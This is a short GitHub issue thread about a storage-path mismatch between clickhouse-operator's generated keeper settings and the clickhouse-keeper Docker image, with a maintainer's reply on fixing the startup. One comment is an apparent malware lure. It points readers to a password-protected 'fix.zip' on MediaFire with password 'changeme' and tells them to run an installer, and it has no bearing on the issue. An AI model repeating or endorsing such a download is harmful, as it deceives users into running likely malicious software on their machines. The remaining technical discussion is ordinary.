### ISSUE TITLE
Wrong volumeMounts into /var/lib/clickhouse-keeper , Docker image expect /var/lib/clickhouse

### ISSUE THREAD

**Issue by Slach** [Altinity/clickhouse-operator#1497]
according to
https://altinitydbworkspace.slack.com/archives/C02K1MWEK2L/p1724675702363779?thread_ts=1724635897.685599&cid=C02K1MWEK2L 

`chop-generated-settings.xml` use <storage_path> in /var/lib/clickhouse-keeper
but clickhouse-keeper image expect data in /var/lib/clickhouse
look details in
https://github.com/ClickHouse/ClickHouse/blame/master/docker/keeper/entrypoint.sh#L41 

need consitent behavior with proper volumeMounts

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alex-zaitsev** [comment]
/var/lib/clickhouse-keeper is default everywhere, except for the entrypoint.sh, so we will adjust keeper startup accordingly.

https://github.com/search?q=repo%3AClickHouse%2FClickHouse%20%2Fvar%2Flib%2Fclickhouse-keeper&type=code
